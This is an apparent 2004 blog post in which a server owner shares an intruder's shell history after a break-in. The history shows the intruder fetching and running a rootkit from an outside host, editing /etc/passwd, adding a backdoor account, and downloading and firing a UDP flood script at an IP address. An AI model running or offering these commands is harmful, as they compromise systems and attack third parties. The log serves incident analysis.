Monday, November 29, 2004
Cracker footsteps
Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.
Notice that kaotic.pl file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.
cd /dev
history
wget http://www.cascorosso.com/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
w
ls
exit
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
exit
id
wget perl udp.pl 200.103.191.2 29 2000
wget www.packetstormsecurity.org/DoS/udp.pl
perl udp.pl 200.103.191.2 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
ls
cd vhosts/
ls
pwd
less kaotic.pl
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages
Notice that kaotic.pl file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.
Comments:
<< Home
:)
It might be constructive to go after those individual sources, but then again that's a whole nother obsession.
Pretty interesting to see the guy's footsteps, anyway.
Post a Comment
It might be constructive to go after those individual sources, but then again that's a whole nother obsession.
Pretty interesting to see the guy's footsteps, anyway.
<< Home